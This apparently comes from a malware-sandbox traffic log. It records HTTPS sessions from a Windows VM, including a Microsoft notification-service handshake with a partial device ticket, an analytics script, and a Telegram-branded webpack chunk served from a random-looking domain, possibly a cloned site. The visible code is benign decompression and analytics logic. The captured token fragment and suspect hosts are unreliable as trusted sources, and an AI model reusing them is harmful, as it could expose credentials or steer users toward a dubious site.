                                  20192.168.2.64977640.115.3.253443
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:44 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2b 5a 66 47 38 56 51 44 2b 30 79 45 47 4e 56 36 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 30 33 37 34 64 33 61 61 37 64 31 31 33 37 62 0d 0a 0d 0a
                                  Data Ascii: CNT 1 CON 305MS-CV: +ZfG8VQD+0yEGNV6.1Context: d0374d3aa7d1137b
                                  2025-01-12 00:03:44 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                  2025-01-12 00:03:44 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 2b 5a 66 47 38 56 51 44 2b 30 79 45 47 4e 56 36 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 30 33 37 34 64 33 61 61 37 64 31 31 33 37 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 35 41 7a 6f 46 32 68 39 41 6f 44 47 6d 6f 72 76 2f 53 70 54 2b 57 55 51 62 70 2f 49 4a 4c 31 43 62 44 33 6d 38 36 4b 6f 34 61 64 51 46 64 75 2b 31 53 78 66 38 76 7a 4e 6a 57 31 6e 34 7a 65 37 63 6f 44 5a 49 46 66 4d 62 55 4a 63 6a 58 5a 57 2b 70 4d 74 4b 78 61 2f 30 64 33 48 56 43 2b 2f 54 58 2b 75 62 6a 67 33 75 44 67 77
                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: +ZfG8VQD+0yEGNV6.2Context: d0374d3aa7d1137b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR5AzoF2h9AoDGmorv/SpT+WUQbp/IJL1CbD3m86Ko4adQFdu+1Sxf8vzNjW1n4ze7coDZIFfMbUJcjXZW+pMtKxa/0d3HVC+/TX+ubjg3uDgw
                                  2025-01-12 00:03:44 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 2b 5a 66 47 38 56 51 44 2b 30 79 45 47 4e 56 36 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 30 33 37 34 64 33 61 61 37 64 31 31 33 37 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: +ZfG8VQD+0yEGNV6.3Context: d0374d3aa7d1137b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                  2025-01-12 00:03:44 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                  Data Ascii: 202 1 CON 58
                                  2025-01-12 00:03:44 UTC58INData Raw: 4d 53 2d 43 56 3a 20 54 74 64 6d 47 42 67 4e 57 6b 4f 59 58 77 61 6e 49 36 46 67 74 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                  Data Ascii: MS-CV: TtdmGBgNWkOYXwanI6Fgtw.0Payload parsing failed.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  21192.168.2.649787172.67.159.634432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:44 UTC352OUTGET /script.js HTTP/1.1
                                  Host: hu.bafanglaicai.app
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:45 UTC1190INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:45 GMT
                                  Content-Type: application/javascript; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-DNS-Prefetch-Control: on
                                  Content-Security-Policy: default-src 'self';img-src * data:;script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline';connect-src 'self' api.umami.is cloud.umami.is;frame-ancestors 'self' undefined
                                  Cache-Control: public, max-age=14400
                                  Last-Modified: Wed, 28 Aug 2024 02:52:03 GMT
                                  ETag: W/"a11-19196e5b838"
                                  Vary: Accept-Encoding
                                  CF-Cache-Status: REVALIDATED
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4adFUr3NS8Ap7CCNcUSQqD5el9bHqOT5IJFBhqxo%2BqrZzzw03ExXye08SPAJ%2BqxLsm92qDbpgsyn42ZUoD06dySVYHRWpcJ%2FX1yBCLkJJwzUVut6ZR9zFXvrdIS0dKVh5rFddav1"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e29e7e5fefa5-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2131&min_rtt=2053&rtt_var=826&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=930&delivery_rate=1422308&cwnd=208&unsent_bytes=0&cid=6a5fc9d812a3022f&ts=397&x=0"
                                  2025-01-12 00:03:45 UTC179INData Raw: 61 31 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 3d 3e 7b 63 6f 6e 73 74 7b 73 63 72 65 65 6e 3a 7b 77 69 64 74 68 3a 65 2c 68 65 69 67 68 74 3a 61 7d 2c 6e 61 76 69 67 61 74 6f 72 3a 7b 6c 61 6e 67 75 61 67 65 3a 72 7d 2c 6c 6f 63 61 74 69 6f 6e 3a 6e 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 3a 69 2c 64 6f 63 75 6d 65 6e 74 3a 63 2c 68 69 73 74 6f 72 79 3a 6f 7d 3d 74 2c 7b 68 6f 73 74 6e 61 6d 65 3a 73 2c 68 72 65 66 3a 75 7d 3d 6e 2c 7b 63 75 72 72 65 6e 74 53 63 72 69 70 74 3a 6c 2c
                                  Data Ascii: a11!function(){"use strict";(t=>{const{screen:{width:e,height:a},navigator:{language:r},location:n,localStorage:i,document:c,history:o}=t,{hostname:s,href:u}=n,{currentScript:l,
                                  2025-01-12 00:03:45 UTC1369INData Raw: 72 65 66 65 72 72 65 72 3a 64 7d 3d 63 3b 69 66 28 21 6c 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 66 3d 22 64 61 74 61 2d 22 2c 6d 3d 6c 2e 67 65 74 41 74 74 72 69 62 75 74 65 2e 62 69 6e 64 28 6c 29 2c 68 3d 6d 28 66 2b 22 77 65 62 73 69 74 65 2d 69 64 22 29 2c 70 3d 6d 28 66 2b 22 68 6f 73 74 2d 75 72 6c 22 29 2c 67 3d 6d 28 66 2b 22 74 61 67 22 29 2c 79 3d 22 66 61 6c 73 65 22 21 3d 3d 6d 28 66 2b 22 61 75 74 6f 2d 74 72 61 63 6b 22 29 2c 62 3d 22 74 72 75 65 22 3d 3d 3d 6d 28 66 2b 22 65 78 63 6c 75 64 65 2d 73 65 61 72 63 68 22 29 2c 76 3d 6d 28 66 2b 22 64 6f 6d 61 69 6e 73 22 29 7c 7c 22 22 2c 53 3d 76 2e 73 70 6c 69 74 28 22 2c 22 29 2e 6d 61 70 28 28 74 3d 3e 74 2e 74 72 69 6d 28 29 29 29 2c 77 3d 60 24 7b 28 70 7c 7c 22 22 7c 7c 6c 2e 73 72 63
                                  Data Ascii: referrer:d}=c;if(!l)return;const f="data-",m=l.getAttribute.bind(l),h=m(f+"website-id"),p=m(f+"host-url"),g=m(f+"tag"),y="false"!==m(f+"auto-track"),b="true"===m(f+"exclude-search"),v=m(f+"domains")||"",S=v.split(",").map((t=>t.trim())),w=`${(p||""||l.src
                                  2025-01-12 00:03:45 UTC1036INData Raw: 61 74 61 3a 21 30 2c 63 68 69 6c 64 4c 69 73 74 3a 21 30 7d 29 7d 29 28 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 28 61 73 79 6e 63 20 74 3d 3e 7b 63 6f 6e 73 74 20 65 3d 74 3d 3e 5b 22 42 55 54 54 4f 4e 22 2c 22 41 22 5d 2e 69 6e 63 6c 75 64 65 73 28 74 29 2c 61 3d 61 73 79 6e 63 20 74 3d 3e 7b 63 6f 6e 73 74 20 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 2e 62 69 6e 64 28 74 29 2c 61 3d 65 28 41 29 3b 69 66 28 61 29 7b 63 6f 6e 73 74 20 72 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 61 6d 65 73 28 29 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 63 6f 6e 73 74 20 61 3d 74 2e 6d 61 74 63 68 28 54 29 3b 61 26 26 28 72 5b 61 5b 31 5d 5d 3d 65 28 74 29 29 7d 29 29 2c 49 28 61 2c
                                  Data Ascii: ata:!0,childList:!0})})(),c.addEventListener("click",(async t=>{const e=t=>["BUTTON","A"].includes(t),a=async t=>{const e=t.getAttribute.bind(t),a=e(A);if(a){const r={};return t.getAttributeNames().forEach((t=>{const a=t.match(T);a&&(r[a[1]]=e(t))})),I(a,
                                  2025-01-12 00:03:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  22192.168.2.649788172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:44 UTC445OUTGET /7784.df07a876b22e3b2a83e9.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://wkybcnfuqpgjx.ltd/3559.80b270ba0e217557b392.js
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:45 UTC921INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:45 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-53e5"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6952
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ydXAHzqODEemWWy5FVjfXXu3HPhivoBCt9heao1CphaJMHGMSsQb0fdsIypPdnFh%2FN4ab3M68Y9xZ7xOtfDSee0luojc9DR8OH0wSZQkJxQhlkDWC7ngUJ%2FJqo1DKhZzKQwscw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e29e7918433e-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1870&min_rtt=1868&rtt_var=705&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1023&delivery_rate=1546610&cwnd=249&unsent_bytes=0&cid=3f52566170891512&ts=146&x=0"
                                  2025-01-12 00:03:45 UTC448INData Raw: 35 33 65 35 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 37 37 38 34 2e 64 66 30 37 61 38 37 36 62 32 32 65 33 62 32 61 38 33 65 39 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 37 38 34 5d 2c 7b 37 37 38 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 28 65 2c 74 2c 69 2c 6e 29 3d 3e 7b 6c 65 74 20 61 3d 36 35 35 33 35 26 65 2c 72 3d 65 3e 3e 3e 31 36 26 36 35 35 33
                                  Data Ascii: 53e5/*! For license information please see 7784.df07a876b22e3b2a83e9.js.LICENSE.txt */(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[7784],{7784:function(e,t){!function(e){"use strict";var t=(e,t,i,n)=>{let a=65535&e,r=e>>>16&6553
                                  2025-01-12 00:03:45 UTC1369INData Raw: 2b 29 65 3d 31 26 65 3f 33 39 38 38 32 39 32 33 38 34 5e 65 3e 3e 3e 31 3a 65 3e 3e 3e 31 3b 74 5b 69 5d 3d 65 7d 72 65 74 75 72 6e 20 74 7d 29 28 29 29 3b 76 61 72 20 6e 3d 28 65 2c 74 2c 6e 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 69 2c 73 3d 61 2b 6e 3b 65 5e 3d 2d 31 3b 66 6f 72 28 6c 65 74 20 69 3d 61 3b 69 3c 73 3b 69 2b 2b 29 65 3d 65 3e 3e 3e 38 5e 72 5b 32 35 35 26 28 65 5e 74 5b 69 5d 29 5d 3b 72 65 74 75 72 6e 7e 65 7d 3b 63 6f 6e 73 74 20 61 3d 31 36 32 30 39 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 69 2c 6e 2c 72 2c 73 2c 6f 2c 6c 2c 64 2c 66 2c 68 2c 63 2c 75 2c 77 2c 62 2c 6d 2c 6b 2c 5f 2c 67 2c 70 2c 76 2c 78 2c 79 2c 45 2c 52 2c 41 3b 63 6f 6e 73 74 20 5a 3d 65 2e 73 74 61 74 65 3b 69 3d 65 2e 6e 65 78
                                  Data Ascii: +)e=1&e?3988292384^e>>>1:e>>>1;t[i]=e}return t})());var n=(e,t,n,a)=>{const r=i,s=a+n;e^=-1;for(let i=a;i<s;i++)e=e>>>8^r[255&(e^t[i])];return~e};const a=16209;var r=function(e,t){let i,n,r,s,o,l,d,f,h,c,u,w,b,m,k,_,g,p,v,x,y,E,R,A;const Z=e.state;i=e.nex
                                  2025-01-12 00:03:45 UTC1369INData Raw: 65 28 2d 2d 70 29 3b 79 3d 72 2d 78 2c 45 3d 41 7d 7d 7d 65 6c 73 65 20 69 66 28 79 2b 3d 68 2d 70 2c 70 3c 76 29 7b 76 2d 3d 70 3b 64 6f 7b 41 5b 72 2b 2b 5d 3d 63 5b 79 2b 2b 5d 7d 77 68 69 6c 65 28 2d 2d 70 29 3b 79 3d 72 2d 78 2c 45 3d 41 7d 66 6f 72 28 3b 76 3e 32 3b 29 41 5b 72 2b 2b 5d 3d 45 5b 79 2b 2b 5d 2c 41 5b 72 2b 2b 5d 3d 45 5b 79 2b 2b 5d 2c 41 5b 72 2b 2b 5d 3d 45 5b 79 2b 2b 5d 2c 76 2d 3d 33 3b 76 26 26 28 41 5b 72 2b 2b 5d 3d 45 5b 79 2b 2b 5d 2c 76 3e 31 26 26 28 41 5b 72 2b 2b 5d 3d 45 5b 79 2b 2b 5d 29 29 7d 65 6c 73 65 7b 79 3d 72 2d 78 3b 64 6f 7b 41 5b 72 2b 2b 5d 3d 41 5b 79 2b 2b 5d 2c 41 5b 72 2b 2b 5d 3d 41 5b 79 2b 2b 5d 2c 41 5b 72 2b 2b 5d 3d 41 5b 79 2b 2b 5d 2c 76 2d 3d 33 7d 77 68 69 6c 65 28 76 3e 32 29 3b 76 26 26 28
                                  Data Ascii: e(--p);y=r-x,E=A}}}else if(y+=h-p,p<v){v-=p;do{A[r++]=c[y++]}while(--p);y=r-x,E=A}for(;v>2;)A[r++]=E[y++],A[r++]=E[y++],A[r++]=E[y++],v-=3;v&&(A[r++]=E[y++],v>1&&(A[r++]=E[y++]))}else{y=r-x;do{A[r++]=A[y++],A[r++]=A[y++],A[r++]=A[y++],v-=3}while(v>2);v&&(
                                  2025-01-12 00:03:45 UTC1369INData Raw: 26 30 3d 3d 3d 55 5b 78 5d 3b 78 2b 2b 29 3b 66 6f 72 28 45 3c 78 26 26 28 45 3d 78 29 2c 5a 3d 31 2c 70 3d 31 3b 70 3c 3d 73 3b 70 2b 2b 29 69 66 28 5a 3c 3c 3d 31 2c 5a 2d 3d 55 5b 70 5d 2c 5a 3c 30 29 72 65 74 75 72 6e 2d 31 3b 69 66 28 5a 3e 30 26 26 28 30 3d 3d 3d 65 7c 7c 31 21 3d 3d 79 29 29 72 65 74 75 72 6e 2d 31 3b 66 6f 72 28 44 5b 31 5d 3d 30 2c 70 3d 31 3b 70 3c 73 3b 70 2b 2b 29 44 5b 70 2b 31 5d 3d 44 5b 70 5d 2b 55 5b 70 5d 3b 66 6f 72 28 76 3d 30 3b 76 3c 6e 3b 76 2b 2b 29 30 21 3d 3d 74 5b 69 2b 76 5d 26 26 28 68 5b 44 5b 74 5b 69 2b 76 5d 5d 2b 2b 5d 3d 76 29 3b 69 66 28 30 3d 3d 3d 65 3f 28 4f 3d 4e 3d 68 2c 67 3d 32 30 29 3a 31 3d 3d 3d 65 3f 28 4f 3d 6f 2c 4e 3d 6c 2c 67 3d 32 35 37 29 3a 28 4f 3d 64 2c 4e 3d 66 2c 67 3d 30 29 2c 54
                                  Data Ascii: &0===U[x];x++);for(E<x&&(E=x),Z=1,p=1;p<=s;p++)if(Z<<=1,Z-=U[p],Z<0)return-1;if(Z>0&&(0===e||1!==y))return-1;for(D[1]=0,p=1;p<s;p++)D[p+1]=D[p]+U[p];for(v=0;v<n;v++)0!==t[i+v]&&(h[D[t[i+v]]++]=v);if(0===e?(O=N=h,g=20):1===e?(O=o,N=l,g=257):(O=d,N=f,g=0),T
                                  2025-01-12 00:03:45 UTC1369INData Raw: 36 31 39 32 2c 53 3d 31 36 31 39 34 2c 54 3d 31 36 31 39 39 2c 4f 3d 31 36 32 30 30 2c 55 3d 31 36 32 30 36 2c 44 3d 31 36 32 30 39 2c 43 3d 65 3d 3e 28 65 3e 3e 3e 32 34 26 32 35 35 29 2b 28 65 3e 3e 3e 38 26 36 35 32 38 30 29 2b 28 28 36 35 32 38 30 26 65 29 3c 3c 38 29 2b 28 28 32 35 35 26 65 29 3c 3c 32 34 29 3b 66 75 6e 63 74 69 6f 6e 20 49 28 29 7b 74 68 69 73 2e 73 74 72 6d 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6d 6f 64 65 3d 30 2c 74 68 69 73 2e 6c 61 73 74 3d 21 31 2c 74 68 69 73 2e 77 72 61 70 3d 30 2c 74 68 69 73 2e 68 61 76 65 64 69 63 74 3d 21 31 2c 74 68 69 73 2e 66 6c 61 67 73 3d 30 2c 74 68 69 73 2e 64 6d 61 78 3d 30 2c 74 68 69 73 2e 63 68 65 63 6b 3d 30 2c 74 68 69 73 2e 74 6f 74 61 6c 3d 30 2c 74 68 69 73 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74
                                  Data Ascii: 6192,S=16194,T=16199,O=16200,U=16206,D=16209,C=e=>(e>>>24&255)+(e>>>8&65280)+((65280&e)<<8)+((255&e)<<24);function I(){this.strm=null,this.mode=0,this.last=!1,this.wrap=0,this.havedict=!1,this.flags=0,this.dmax=0,this.check=0,this.total=0,this.head=null,t
                                  2025-01-12 00:03:45 UTC1369INData Raw: 73 74 72 6d 3d 65 2c 69 2e 77 69 6e 64 6f 77 3d 6e 75 6c 6c 2c 69 2e 6d 6f 64 65 3d 45 3b 63 6f 6e 73 74 20 6e 3d 46 28 65 2c 74 29 3b 72 65 74 75 72 6e 20 6e 21 3d 3d 6d 26 26 28 65 2e 73 74 61 74 65 3d 6e 75 6c 6c 29 2c 6e 7d 3b 6c 65 74 20 4d 2c 48 2c 6a 3d 21 30 3b 63 6f 6e 73 74 20 4b 3d 65 3d 3e 7b 69 66 28 6a 29 7b 4d 3d 6e 65 77 20 49 6e 74 33 32 41 72 72 61 79 28 35 31 32 29 2c 48 3d 6e 65 77 20 49 6e 74 33 32 41 72 72 61 79 28 33 32 29 3b 6c 65 74 20 74 3d 30 3b 66 6f 72 28 3b 74 3c 31 34 34 3b 29 65 2e 6c 65 6e 73 5b 74 2b 2b 5d 3d 38 3b 66 6f 72 28 3b 74 3c 32 35 36 3b 29 65 2e 6c 65 6e 73 5b 74 2b 2b 5d 3d 39 3b 66 6f 72 28 3b 74 3c 32 38 30 3b 29 65 2e 6c 65 6e 73 5b 74 2b 2b 5d 3d 37 3b 66 6f 72 28 3b 74 3c 32 38 38 3b 29 65 2e 6c 65 6e 73
                                  Data Ascii: strm=e,i.window=null,i.mode=E;const n=F(e,t);return n!==m&&(e.state=null),n};let M,H,j=!0;const K=e=>{if(j){M=new Int32Array(512),H=new Int32Array(32);let t=0;for(;t<144;)e.lens[t++]=8;for(;t<256;)e.lens[t++]=9;for(;t<280;)e.lens[t++]=7;for(;t<288;)e.lens
                                  2025-01-12 00:03:45 UTC1369INData Raw: 64 65 3d 5a 3b 62 72 65 61 6b 7d 66 6f 72 28 3b 4e 3c 31 36 3b 29 7b 69 66 28 30 3d 3d 3d 66 29 62 72 65 61 6b 20 65 3b 66 2d 2d 2c 49 2b 3d 73 5b 6c 2b 2b 5d 3c 3c 4e 2c 4e 2b 3d 38 7d 69 66 28 32 26 61 2e 77 72 61 70 26 26 33 35 36 31 35 3d 3d 3d 49 29 7b 30 3d 3d 3d 61 2e 77 62 69 74 73 26 26 28 61 2e 77 62 69 74 73 3d 31 35 29 2c 61 2e 63 68 65 63 6b 3d 30 2c 24 5b 30 5d 3d 32 35 35 26 49 2c 24 5b 31 5d 3d 49 3e 3e 3e 38 26 32 35 35 2c 61 2e 63 68 65 63 6b 3d 6e 28 61 2e 63 68 65 63 6b 2c 24 2c 32 2c 30 29 2c 49 3d 30 2c 4e 3d 30 2c 61 2e 6d 6f 64 65 3d 31 36 31 38 31 3b 62 72 65 61 6b 7d 69 66 28 61 2e 68 65 61 64 26 26 28 61 2e 68 65 61 64 2e 64 6f 6e 65 3d 21 31 29 2c 21 28 31 26 61 2e 77 72 61 70 29 7c 7c 28 28 28 32 35 35 26 49 29 3c 3c 38 29 2b
                                  Data Ascii: de=Z;break}for(;N<16;){if(0===f)break e;f--,I+=s[l++]<<N,N+=8}if(2&a.wrap&&35615===I){0===a.wbits&&(a.wbits=15),a.check=0,$[0]=255&I,$[1]=I>>>8&255,a.check=n(a.check,$,2,0),I=0,N=0,a.mode=16181;break}if(a.head&&(a.head.done=!1),!(1&a.wrap)||(((255&I)<<8)+
                                  2025-01-12 00:03:45 UTC1369INData Raw: 3d 3d 3d 66 29 62 72 65 61 6b 20 65 3b 66 2d 2d 2c 49 2b 3d 73 5b 6c 2b 2b 5d 3c 3c 4e 2c 4e 2b 3d 38 7d 61 2e 6c 65 6e 67 74 68 3d 49 2c 61 2e 68 65 61 64 26 26 28 61 2e 68 65 61 64 2e 65 78 74 72 61 5f 6c 65 6e 3d 49 29 2c 35 31 32 26 61 2e 66 6c 61 67 73 26 26 34 26 61 2e 77 72 61 70 26 26 28 24 5b 30 5d 3d 32 35 35 26 49 2c 24 5b 31 5d 3d 49 3e 3e 3e 38 26 32 35 35 2c 61 2e 63 68 65 63 6b 3d 6e 28 61 2e 63 68 65 63 6b 2c 24 2c 32 2c 30 29 29 2c 49 3d 30 2c 4e 3d 30 7d 65 6c 73 65 20 61 2e 68 65 61 64 26 26 28 61 2e 68 65 61 64 2e 65 78 74 72 61 3d 6e 75 6c 6c 29 3b 61 2e 6d 6f 64 65 3d 31 36 31 38 35 3b 63 61 73 65 20 31 36 31 38 35 3a 69 66 28 31 30 32 34 26 61 2e 66 6c 61 67 73 26 26 28 4c 3d 61 2e 6c 65 6e 67 74 68 2c 4c 3e 66 26 26 28 4c 3d 66 29
                                  Data Ascii: ===f)break e;f--,I+=s[l++]<<N,N+=8}a.length=I,a.head&&(a.head.extra_len=I),512&a.flags&&4&a.wrap&&($[0]=255&I,$[1]=I>>>8&255,a.check=n(a.check,$,2,0)),I=0,N=0}else a.head&&(a.head.extra=null);a.mode=16185;case 16185:if(1024&a.flags&&(L=a.length,L>f&&(L=f)
                                  2025-01-12 00:03:45 UTC1369INData Raw: 68 65 63 6b 3d 43 28 49 29 2c 49 3d 30 2c 4e 3d 30 2c 61 2e 6d 6f 64 65 3d 52 3b 63 61 73 65 20 52 3a 69 66 28 30 3d 3d 3d 61 2e 68 61 76 65 64 69 63 74 29 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 5f 6f 75 74 3d 64 2c 65 2e 61 76 61 69 6c 5f 6f 75 74 3d 63 2c 65 2e 6e 65 78 74 5f 69 6e 3d 6c 2c 65 2e 61 76 61 69 6c 5f 69 6e 3d 66 2c 61 2e 68 6f 6c 64 3d 49 2c 61 2e 62 69 74 73 3d 4e 2c 5f 3b 65 2e 61 64 6c 65 72 3d 61 2e 63 68 65 63 6b 3d 31 2c 61 2e 6d 6f 64 65 3d 41 3b 63 61 73 65 20 41 3a 69 66 28 69 3d 3d 3d 77 7c 7c 69 3d 3d 3d 62 29 62 72 65 61 6b 20 65 3b 63 61 73 65 20 5a 3a 69 66 28 61 2e 6c 61 73 74 29 7b 49 3e 3e 3e 3d 37 26 4e 2c 4e 2d 3d 37 26 4e 2c 61 2e 6d 6f 64 65 3d 55 3b 62 72 65 61 6b 7d 66 6f 72 28 3b 4e 3c 33 3b 29 7b 69 66 28 30 3d 3d
                                  Data Ascii: heck=C(I),I=0,N=0,a.mode=R;case R:if(0===a.havedict)return e.next_out=d,e.avail_out=c,e.next_in=l,e.avail_in=f,a.hold=I,a.bits=N,_;e.adler=a.check=1,a.mode=A;case A:if(i===w||i===b)break e;case Z:if(a.last){I>>>=7&N,N-=7&N,a.mode=U;break}for(;N<3;){if(0==
